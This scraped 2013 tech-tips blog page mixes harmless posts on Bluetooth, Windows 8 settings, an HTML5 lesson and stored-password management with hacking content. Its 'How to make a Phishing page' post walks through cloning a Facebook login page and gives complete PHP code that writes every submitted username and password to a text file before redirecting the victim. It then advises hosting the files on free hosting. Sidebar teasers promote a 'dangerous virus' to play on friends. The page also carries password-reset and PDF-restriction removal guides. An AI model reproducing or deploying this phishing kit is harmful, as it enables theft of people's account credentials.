Download Microsoft office 2013 Now!

Microsoft has just released the free preview version of the all new Microsoft Office 2013. You can now download Microsoft Office 2013 immediately on your computer to try it.

How to Access Blocked Websites Without Proxy

Access your favorite blocked website and social networking sites at your or college or your workplace without proxy.Download exciting software to access blocked websites.

Make a Very Dangerous Virus with Notepad

Now make your own viruses in Notepad. Make fun with these in your friends computer.

How to remove PDF password

In some PDF files, Owner set the password to that file. It restrict the print, copy or edit the content of PDF file. In such situation PDF password remover application help you to remove password.

How to bypass Surveys on websites

Many websites makes survey to proceed the download or to visit the website. These surveys prove to b headache. To bypass these surveys, there are some tricks to follow.

Tuesday, 19 February 2013

3. How Bluetooth Technology Works

Working

Bluetooth technology was discovered to have wireless protocols to connect several electronic devices and as a solution to synchronize the data. The Bluetooth standard is maintained by the Bluetooth Special Interest Group.
At the physical layer, the Bluetooth RF transceiver is positioned. At around 79 Bluetooth channels are placed with a space of 1MHz. Transmission of data and voice are achievable at short distances and thereby creating Wireless PANs.
A Bluetooth device is comprised of an adapter. A Bluetooth adapter can be available in the form of a card to connect the device or integrated into an electronic device.
Link Management Protocol (LMP) is responsible for peer – to – peer message exchange when the electronic devices interfere in each other’s radio range. This layer creates the link and negotiation of packet size. If required this layer can perform the segmentation and reassembling of the packets.
The Bluetooth device enabled by the Service delivery protocol joins the piconet and enquires with all the services available. A piconet has a star topology with one master and seven slaves. The concept of Master and Slave is used in the Bluetooth technology. Only after the master takes the initial action, the devices can begin to talk. Bluetooth GloballD is exchanged among the electronic devices and a connection is build up after the profiles are matched.
Frequency hopping is used in the Bluetooth technology to avoid interfering with other signals. After the packet is transmitted or received, the Bluetooth signal hops to a new frequency. Each packet can cover five time slots.
The Bluetooth technology supports asynchronous data channel, or 3 simultaneous synchronous voice channels, or a channel which supports asynchronous data and synchronous voice.

<< 2. Applications                                                                                                             4. History of Bluetooth >>

2. Bluetooth Applications

The first and foremost application of Bluetooth technology would be to eradicate the tangling of cables that would mess up the room.

  1. Bluetooth’s biggest contribution is to provide a phone with a headset that works wirelessly. This is possible by providing the caller with an earpiece and a small microphone attached to the caller’s shirt. The mobile phone can be located in a bag or anywhere in the body. The caller can dial a number even without touching a button on the mobile phone. This technology has the advantage of eliminating the radiation hitting the cerebral region.
  2. PDA, PC or laptop which has enabled Bluetooth can communicate with each other and update with its latest information. This technology has helped in synchronizing the data easily.
  3. It is difficult to send emails while travelling in a flight. On landing of the flight, the Bluetooth enabled laptop can send the email only when it gets in touch with the user’s phone.
  4. Wireless mouse and keyboards are introduced.
  5. One will be alerted on his/her mobile phone when your laptop receives the mail.
  6. One will be alerted on his/her mobile phone when your laptop receives the mail.
<< 1. Bluetooth Technology                                                                                         3. How Bluetooth works >>

Monday, 18 February 2013

1. Bluetooth Technology

What is Bluetooth?
      Bluetooth is a wireless technology used to transfer data between different electronic devices. The distance of data transmission is small in comparison to other modes of wireless communication. This technology eradicates the use of cords, cables, adapters and permits the electronic devices to communicate wirelessly among each other.  

The key features of Bluetooth technology:
  • Less complication
  • Less power consumption
  • Available at cheaper rates
  • Robustness

Bluetooth technology permits hands free headset for incoming voice calls, ability of printing and fax, and automatic synchronization of PDA.
Classification
Various types of Bluetooth technology are available in the markets which help the consumers to communicate wirelessly. The different types of Bluetooth devices are PC cards, radios, dongles, and headsets. Laptops and other Internet enabled equipments use Bluetooth technology such as wireless mouse and keyboard to communicate wirelessly. Music players like iPods, music phones, or other MP3 players make use of stereo headphones.

Go to Index                                                                                                      2. Bluetooth Applications >>

How to make a Phishing page


What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page.

How to create?

  • Visit the page that you want to clone.
  • Save it (CTRL+S) via your browser.
  • Choose save complete webpage while saving it via browser.
  • Give name index while saving. (Dont use other name!)
  • Save it to a folder.
  • Now, you should have one file named "index.htm" and a folder.
  • We have to edit index.htm file.
  • Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1" method="post" , We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.

  • How to create login.php?

    Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.

    Code:

    <?php
    header("Location: http://www.google.com");
    $handle = fopen("passes.txt", "a");
    foreach($_GET as $variable => $value)
    {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
     

    You have to change http://www.google.com to the site url that you are cloning, for example, change it to http://www.facebook.com/ if you are cloning facebook.

    Now, you have your phishing page.

Now, you upload the above two files, login.php and passes.txt on any free web hosting site 
(eg. www.my3gb.com).

How to modify *.exe files



Learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.

First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at http://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too


3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are

-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.

*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.

*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.

*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!

*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!

*Cursor group: Change the mouse cursors used in the program just like you would change the icon.

*Bitmap: View or change images in the programs easy!

*WAV:Change the sounds in the prog. with your own.


5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.


TIP: To change a window title, search for something like: CAPTION "edit this".

TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).

TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.

TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

Sunday, 17 February 2013

Forgot Windows Live Password in Windows 8


With Windows 8, you can sign in to your PC with a Windows Live account. This allows syncing and sharing personal data across multiple devices very easily. You might also be wondering, “How to log on the computer if I forgot my Windows Live password?” Well, here is a excellent hack for you.
With Password Recovery Bundle utility you can create a bootable password reset CD, and set your computer to boot from the CD and it enables you to reset forgotten Windows Live password which is stored on your local computer. After resetting, you will regain full access to your PC with a new password.
How to Reset Forgotten Windows Live Password in Windows 8?
  1. First you need to download Password Recovery Bundle program on another computer. After installing and running the program, click the Windows Password button, which allows you to create a bootable password reset disk in 3 steps. Insert a blank CD/DVD or USB drive into the computer and click Start Burn to create a bootdisk.
  2. Insert the password reset bootdisk you’ve created into your Windows 8 computer. Turn on the computer and hold down F2 or whatever the setup key is shown as during the initial boot screen. This should bring up the BIOS.
    In the BIOS look for the Boot Device Priority option, set CD/DVD as the 1st boot device if you want to boot from CD. You can either set Removable Device as the 1st boot device if you want to boot off USB drive. Save your changes.
  3. Restart the computer and now it will boot from the password reset bootdisk. After one or two minutes the bootdisk will launch the Reset Windows Password utility. Choose the local user account which is linked to your Windows Live ID, and then click Reset Password button. The program will set your Windows Live password toPassword123 instantly.

  4. Now remove the password reset bootdisk and restart the computer, you can then quickly sign in to Windows 8 using your Windows Live account and the new password: Password123.
Password Recovery Bundle could also reset forgotten login password in Windows 7/Vista/XP/2003/2000. It should be the first Windows password recovery program which supports the latest operating system Windows 8.

Saturday, 16 February 2013

How to Turn Off App Notification in Windows 8

Windows 8 displays app notifications in the Metro-style Start Screen for installed apps, Calendar events, new email, and other app events. But you might not be interested in getting notifications for all apps, in such cases you can configure which apps can sent out notifications for you. In this article we’ll show you how to turn off app notifications in Windows 8.

How to Turn Off App Notification in Windows 8?
1. Access the Charms bar by pressing Windows + C or moving your mouse to the bottom right of the screen and    slowly moving the mouse up. When the Charms bar appears, click on the Settings.

2. Click on More PC Settings link at the bottom of the sidebar.

3. In the PC Settings screen, navigate to Notifications section in the left pane.


4. In the right pane, there are ‘Show app notifications’, ‘Show app notifications on the Lock Screen’ and ‘Play notification sounds’ toggles. In order to complete turn off notifications for all apps, just turn off the Show app Notifications option.

5. Other than turning off notifications for all installed apps, you can do so selectively as well. The lower part of the Notifications settings screen allows you to turn off notifications for individual apps of your choice.

How to disable Windows 8 Lock Screen

By default, Windows 8 shows Lock Screen at startup, which displays the date ad well as notifications. You have to click the screen before you can get to the logon screen. This seems like something that makes more sense on a tablet PC.


If you are using a desktop or laptop computer, you can disable the Lock Screen so the computer will boot up directly to logon screen to choose the user account to log in to Windows 8. Fortunately, you can disable the Lock Screen from Local Group Policy Editor.
How to Disable Windows 8 Lock Screen?
1. The first thing you need to do is to open the Local Group Policy Editor by pressing the Windows + R key combination to bring up a Run box, then type gpedit.msc and hit Enter.
2. Now, expand Administrative Templates settings from Computer Configuration, and then navigate to Control Panel –> Personalization. In main window, you will find Do not display the lock screen policy.


3. Double-click this policy and tick Enabled checkbox. This will permanently disable Lock Screen. When disabled, users will see the logon screen when they log off or lock out Windows. Similarly, you will be taken to logon screen directly, instead of Lock Screen, at startup.


How to remove PDF Password


A PDF owner password is the password used to set document restrictions on PDF files. In Adobe Acrobat, the PDF owner password is called the change permissions password. If you forgot PDF owner password, you can’t print, copy or edit the content of your protected PDF file. In such a situation, you might want to use a PDF password remover application that can help you to remove forgotten PDF owner password. And PDF Password Recovery program does exactly that.
How to Remove PDF Owner Password When You Forgot It?

  1. Download and install PDF Password Recovery software on your computer.
  2. Run PDF Password Recovery program, then click the  button to select your password-protected PDF document (*.pdf), then choose the Remove Owner Password option.
  3. Click the Next button.
  4. Immediately the tool will decrypt the owner password and remove the security restrictions imposed on it, and a new non-protected copy will be created. You will then be allowed to print, copy, modify the decrypted PDF document without even knowing the password.


There is no need to worry about forgetting PDF owner password. Just follow the steps above and you can remove PDF owner password quickly and easily!

Remove Saved Network Passwords in Windows XP,Vista,7

Windows stores user names and passwords on your PC so when you try to log on to network shares, websites (Windows Integrated Authentication) or Remote Desktop Connections, you don’t have to reenter the login information. Caching logins can be helpful if users have multiple usernames and passwords for different programs and can also speed login times for users. However, by storing passwords, Windows also makes it possible for an unauthorized person to walk up to the computer and use the stored passwords to access the protected programs.



I recommend checking which passwords Windows has already stored and delete those that pose a high security risk. Here’s the method to remove stored Windows network passwords.
How to Remove Stored Network Passwords in Windows 7?
You can access the Windows Vault through the Credential Manager. The easiest way is by just typing “Credential Manager” in the Windows 7 Start Menu search prompt. You can also access the Credential Manager through the Control Panel: -> User Accounts -> User Accounts. The link to the Credential Manager can be found in the left navigation bar.
You can remove an entry by selecting it from the list and clicking Remove.
How to Remove Stored Network Passwords in Windows Vista?
To access Stored Usernames and Passwords, you have to run “control userpasswords2″ from the command prompt, then click on Advanced, and then on Manage Passwords. You can also launch the tool via the Control Panel: User Accounts -> User Accounts, and then click on “Manage your network passwords” in the left navigation bar.
You can remove an entry by selecting it from the list and clicking Remove.
How to Remove Stored Network Passwords in Windows XP?
In Windows XP, to access Stored Usernames and Passwords, you have to run “control userpasswords2″ from the command prompt, then click on Advanced, and then on Manage Passwords. You can also launch the tool by running “rundll32.exe keymgr.dll, KRShowKeyMgr” from the command prompt.
You can remove an entry by selecting it from the list and clicking Remove.

Friday, 15 February 2013

Working with Paragraphs and Text - 05

In this lesson, Bob discusses the various semantic meanings of popular HTML5 inline tags useful for marking up text inside of paragraphs, including b, i, small, em, mark, span, and much more.



Download Links -

High Quality MP4
Mid Quality MP4
MP3 (Audio Only)

<<<Understanding the HTML5 You Wrote - 04

Download Windows 7 ISO (32-bit and 64-bit Direct Downloads Links)


Windows 7 is one of the popular operating system of Microsoft. It provides many new features with new look and it is faster than all other versions of Microsoft.

Download Windows 7 full versions ISO files directly.
Windows 7 Professional:

Windows 7 Home Premium:

Windows 7 Ultimate:

Search